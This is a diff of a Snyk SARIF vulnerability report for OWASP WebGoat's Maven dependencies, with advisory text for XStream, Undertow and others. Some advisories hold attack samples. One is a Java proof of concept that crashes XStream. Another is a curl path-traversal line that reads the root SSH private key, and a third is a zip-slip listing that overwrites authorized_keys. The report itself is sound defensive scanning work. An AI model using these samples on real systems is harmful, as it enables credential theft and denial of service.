-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Insecure XML deserialization. It could deserialize arbitrary user-supplied XML content, representing objects of any type. A remote attacker able to pass XML to XStream could use this flaw to perform a variety of attacks, including remote code execution in the context of the server running the XStream application.\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.7, 1.4.11 or higher.\n# References\n- [Dinis Cruz Blog](http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html)\n- [Exploit DB](https://www.exploit-db.com/exploits/39193)\n- [Fisheye](https://fisheye.codehaus.org/changelog/xstream?cs=2210)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6344867dce6767af7d0fe34fb393271a6456672d)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2013-7285)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1051277)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7285.yaml)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Insecure XML deserialization. It could deserialize arbitrary user-supplied XML content, representing objects of any type. A remote attacker able to pass XML to XStream could use this flaw to perform a variety of attacks, including remote code execution in the context of the server running the XStream application.\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.7, 1.4.11 or higher.\n# References\n- [Dinis Cruz Blog](http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html)\n- [Exploit DB](https://www.exploit-db.com/exploits/39193)\n- [Fisheye](https://fisheye.codehaus.org/changelog/xstream?cs=2210)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/6344867dce6767af7d0fe34fb393271a6456672d)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2013-7285)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1051277)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2013/CVE-2013-7285.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-94",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-94", "maven"],
                 "cvssv3_baseScore": 4.8,
                 "security-severity": "4.8"
               }
@@ -1014,3075 +670,195 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to a manipulated binary input stream. An attacker can terminate the application with a stack overflow error resulting in a denial of service by manipulating the processed input stream when configured to use the `BinaryStreamDriver`.\n\n# Workaround\n\nThis vulnerability can be mitigated by catching the `StackOverflowError` in the client code calling XStream.\n# PoC\nPrepare the manipulated data and provide it as input for a XStream instance using the BinaryDriver:\n\n```java\nfinal byte[] byteArray = new byte[36000];\nfor (int i = 0; i < byteArray.length / 4; i++) {\n      byteArray[i * 4] = 10;\n      byteArray[i * 4 + 1] = -127;\n      byteArray[i * 4 + 2] = 0;\n      byteArray[i * 4 + 3] = 0;\n}\n\nXStream xstream = new XStream(new BinaryStreamDriver());\nxstream.fromXML(new ByteArrayInputStream(byteArray));\n```\n\nAs soon as the data gets unmarshalled, the endless recursion is entered and the executing thread is aborted with a stack overflow error.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.21 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/fdd9f7d3de0d7ccf2f9979bcd09fbf3e6a0c881a)\n- [XStream Advisory](https://x-stream.github.io/CVE-2024-47072.html)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to a manipulated binary input stream. An attacker can terminate the application with a stack overflow error resulting in a denial of service by manipulating the processed input stream when configured to use the `BinaryStreamDriver`.\n\n# Workaround\n\nThis vulnerability can be mitigated by catching the `StackOverflowError` in the client code calling XStream.\n# PoC\nPrepare the manipulated data and provide it as input for a XStream instance using the BinaryDriver:\n\n```java\nfinal byte[] byteArray = new byte[36000];\nfor (int i = 0; i < byteArray.length / 4; i++) {\n      byteArray[i * 4] = 10;\n      byteArray[i * 4 + 1] = -127;\n      byteArray[i * 4 + 2] = 0;\n      byteArray[i * 4 + 3] = 0;\n}\n\nXStream xstream = new XStream(new BinaryStreamDriver());\nxstream.fromXML(new ByteArrayInputStream(byteArray));\n```\n\nAs soon as the data gets unmarshalled, the endless recursion is entered and the executing thread is aborted with a stack overflow error.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, thus allowing the attacker to control the state or the flow of the execution.\n  \n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.21 or higher.\n# References\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266)\n- [GitHub Commit](https://github.com/x-stream/xstream/commit/fdd9f7d3de0d7ccf2f9979bcd09fbf3e6a0c881a)\n- [XStream Advisory](https://x-stream.github.io/CVE-2024-47072.html)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 8.7,
                 "security-severity": "8.7"
               }
             },
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-12458577",
+              "id": "SNYK-JAVA-ORGAPACHECOMMONS-10734078",
               "shortDescription": {
-                "text": "High severity - Allocation of Resources Without Limits or Throttling (MadeYouReset) vulnerability in io.undertow:undertow-core"
+                "text": "High severity - Uncontrolled Recursion vulnerability in org.apache.commons:commons-lang3"
               },
               "fullDescription": {
-                "text": "(CVE-2025-9784) io.undertow:undertow-core@2.3.10.Final"
+                "text": "(CVE-2025-48924) org.apache.commons:commons-lang3@3.14.0"
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling (MadeYouReset) through malformed client requests that trigger repeated server-side stream resets without incrementing abuse counters. An attacker can exhaust server resources by sending specially crafted HTTP/2 requests that cause excessive workload through repeated stream aborts.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.3.20.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/1d013b28395cffe5d2c8ba8f6fe767242bee0962)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/39fcfbeb479acca9aaa94190c1877d632c5ac00e)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/46108066c6b04bda57505290971023e5e83ac9ed)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/afbd244df47f07c5816f029cc9e50ea99f159f01)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2392306)\n- [Vulnerability Research](https://www.imperva.com/blog/madeyoureset-turning-http-2-server-against-itself/)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.commons:commons-lang3\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and org.apache.commons:commons-lang3@3.14.0\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › org.apache.commons:commons-lang3@3.14.0\n# Overview\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion via the `ClassUtils.getClass` function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.\n# Remediation\nUpgrade `org.apache.commons:commons-lang3` to version 3.18.0 or higher.\n# References\n- [Apache Pony Mail](https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1)\n- [GitHub Commit](https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-770",
-                  "CWE-404",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.7,
-                "security-severity": "8.7"
+                "tags": ["security", "CWE-674", "maven"],
+                "cvssv3_baseScore": 8.8,
+                "security-severity": "8.8"
               }
             },
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-6567186",
+              "id": "SNYK-JAVA-ORGJRUBY-10557730",
               "shortDescription": {
-                "text": "High severity - Improper Input Validation vulnerability in io.undertow:undertow-core"
+                "text": "High severity - Denial of Service (DoS) vulnerability in org.jruby:jruby-stdlib"
               },
               "fullDescription": {
-                "text": "(CVE-2023-1973) io.undertow:undertow-core@2.3.10.Final"
+                "text": "(CVE-2025-25186) org.jruby:jruby-stdlib@10.0.0.1"
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Improper Input Validation via the `FormAuthenticationMechanism`. An attacker can exhaust the server's memory, leading to a Denial of Service by sending crafted requests that cause an OutofMemory error.\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.32.Final, 2.3.13.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/0410f3c4d9b39b754a2203a29834cac51da11258)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/ddb4aeeb32f7ed58d715124acf1d464fc14b30dd/core/src/main/java/io/undertow/security/impl/FormAuthenticationMechanism.java#L46)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: org.jruby:jruby-stdlib\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT, org.asciidoctor:asciidoctorj@3.0.0 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › org.asciidoctor:asciidoctorj@3.0.0 › org.jruby:jruby@10.0.0.1 › org.jruby:jruby-stdlib@10.0.0.1\n# Overview\n[org.jruby:jruby-stdlib](https://www.jruby.org/) is a JRuby Lib Setup package.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) through the `response parser` which uses `Range#to_a` to convert the `uid-set` data into arrays of integers, without limitations on the expanded size of the ranges.\n# Remediation\nA fix was pushed into the `master` branch but not yet published.\n# References\n- [GitHub Commit](https://github.com/ruby/net-imap/commit/70e3ddd071a94e450b3238570af482c296380b35)\n- [GitHub Commit](https://github.com/ruby/net-imap/commit/c8c5a643739d2669f0c9a6bb9770d0c045fd74a3)\n- [GitHub Commit](https://github.com/ruby/net-imap/commit/cb92191b1ddce2d978d01b56a0883b6ecf0b1022)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-20",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.5,
-                "security-severity": "7.5"
+                "tags": ["security", "CWE-400", "maven"],
+                "cvssv3_baseScore": 7.1,
+                "security-severity": "7.1"
               }
             },
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-6669948",
+              "id": "snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)",
               "shortDescription": {
-                "text": "High severity - Allocation of Resources Without Limits or Throttling vulnerability in io.undertow:undertow-core"
+                "text": "Medium severity - Dual license: EPL-1.0, LGPL-2.1 vulnerability in ch.qos.logback:logback-classic"
               },
               "fullDescription": {
-                "text": "(CVE-2023-5379) io.undertow:undertow-core@2.3.10.Final"
+                "text": "ch.qos.logback:logback-classic@1.5.18"
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling. An attacker can disrupt service availability by repeatedly sending AJP requests that exceed the configured `max-header-size` attribute in `ajp-listener`, leading to the server closing the TCP connection without returning an AJP response.\r\n\r\n**Note:**\r\n\r\nThis is only exploitable if the `max-header-size` is set to 64 KB or less.\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.31.Final, 2.3.12.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/b0732610112cb2066b5e43a47a11008edfacee02)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2242099)\n"
+                "markdown": "* Package Manager: maven\n* Module: ch.qos.logback:logback-classic\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.5.6 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.5.6 › org.springframework.boot:spring-boot-starter@3.5.6 › org.springframework.boot:spring-boot-starter-logging@3.5.6 › ch.qos.logback:logback-classic@1.5.18\nDual license: EPL-1.0, LGPL-2.1"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-770",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.5,
-                "security-severity": "7.5"
+                "tags": ["security", "maven"],
+                "security-severity": "undefined"
               }
             },
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-7300152",
+              "id": "snyk:lic:maven:com.github.jnr:jnr-posix:(EPL-1.0_OR_GPL-2.0_OR_LGPL-2.1)",
               "shortDescription": {
-                "text": "High severity - Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability in io.undertow:undertow-core"
+                "text": "High severity - Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1 vulnerability in com.github.jnr:jnr-posix"
               },
               "fullDescription": {
-                "text": "(CVE-2024-6162) io.undertow:undertow-core@2.3.10.Final"
+                "text": "com.github.jnr:jnr-posix@3.1.20"
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') through the handling of URL-encoded request path information on `ajp-listener`. An attacker can cause the server to process incorrect paths, leading to a disruption of service by sending specially crafted concurrent requests.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2293069)\n"
+                "markdown": "* Package Manager: maven\n* Module: com.github.jnr:jnr-posix\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT, org.asciidoctor:asciidoctorj@3.0.0 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › org.asciidoctor:asciidoctorj@3.0.0 › org.jruby:jruby@10.0.0.1 › org.jruby:jruby-base@10.0.0.1 › com.github.jnr:jnr-posix@3.1.20\nMultiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.7,
-                "security-severity": "8.7"
+                "tags": ["security", "maven"],
+                "security-severity": "undefined"
               }
             },
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-7300153",
+              "id": "snyk:lic:maven:org.hibernate.orm:hibernate-core:LGPL-2.1",
               "shortDescription": {
-                "text": "High severity - Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability in io.undertow:undertow-core"
+                "text": "Medium severity - LGPL-2.1 license vulnerability in org.hibernate.orm:hibernate-core"
               },
               "fullDescription": {
-                "text": "(CVE-2024-27316) io.undertow:undertow-core@2.3.10.Final"
+                "text": "org.hibernate.orm:hibernate-core@6.6.29.Final"
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to insufficient limitations on the amount of `CONTINUATION` frames that can be sent within a single stream. An attacker can use up compute or memory resources to cause a disruption in service by sending packets to vulnerable servers.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n# References\n- [Apache Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)\n- [Github Commit](https://github.com/undertow-io/undertow/commit/c27c1e40c945c11f13b210fd72fadf0ae641f3d0)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/296636d341dd8c9ff60dae017500c61f051bc42a)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/d798de663e834450acec1041e44bae938a7b45b6)\n- [PoC](https://github.com/lockness-Ko/CVE-2024-27316)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2268277)\n- [Security Notes](https://www.kb.cert.org/vuls/id/421644)\n"
+                "markdown": "* Package Manager: maven\n* Module: org.hibernate.orm:hibernate-core\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT, org.springframework.boot:spring-boot-starter-data-jpa@3.5.6 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › org.springframework.boot:spring-boot-starter-data-jpa@3.5.6 › org.hibernate.orm:hibernate-core@6.6.29.Final\nLGPL-2.1 license"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.7,
-                "security-severity": "8.7"
+                "tags": ["security", "maven"],
+                "security-severity": "undefined"
               }
-            },
+            }
+          ]
+        }
+      },
+      "automationDetails": {
+        "id": "Snyk/Open Source/org.owasp.webgoat:webgoat/2025-11-19T14:07:36.859Z"
+      },
+      "results": [
+        {
+          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-13169722",
+          "level": "warning",
+          "message": {
+            "text": "This file introduces a vulnerable ch.qos.logback:logback-core package with a medium severity vulnerability."
+          },
+          "locations": [
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-7361775",
-              "shortDescription": {
-                "text": "Medium severity - Directory Traversal vulnerability in io.undertow:undertow-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-1459) io.undertow:undertow-core@2.3.10.Final"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Directory Traversal due to improper input validation of the HTTP request. An attacker can access privileged or restricted files and directories by appending a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP.\n\n# Details\n\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\n\nDirectory Traversal vulnerabilities can be generally divided into two types:\n\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\n\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\n\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\n\n```\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\n```\n**Note** `%2e` is the URL encoded version of `.` (dot).\n\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \n\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\n\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\n\n```\n2018-04-15 22:04:29 .....           19           19  good.txt\n2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys\n```\n\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.12.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/9b7c5037eb3eff021366233a0af6b82ec83c7d94)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2259475)\n"
+              "physicalLocation": {
+                "artifactLocation": {
+                  "uri": "pom.xml"
+                },
+                "region": {
+                  "startLine": 1
+                }
               },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-22",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 5.3,
-                "security-severity": "5.3"
-              }
-            },
+              "logicalLocations": [
+                {
+                  "fullyQualifiedName": "ch.qos.logback:logback-core@1.5.18"
+                }
+              ]
+            }
+          ],
+          "fixes": [
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-7433721",
-              "shortDescription": {
-                "text": "Low severity - Memory Leak vulnerability in io.undertow:undertow-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-3653) io.undertow:undertow-core@2.3.10.Final"
-              },
-              "help": {
-                "text": "",
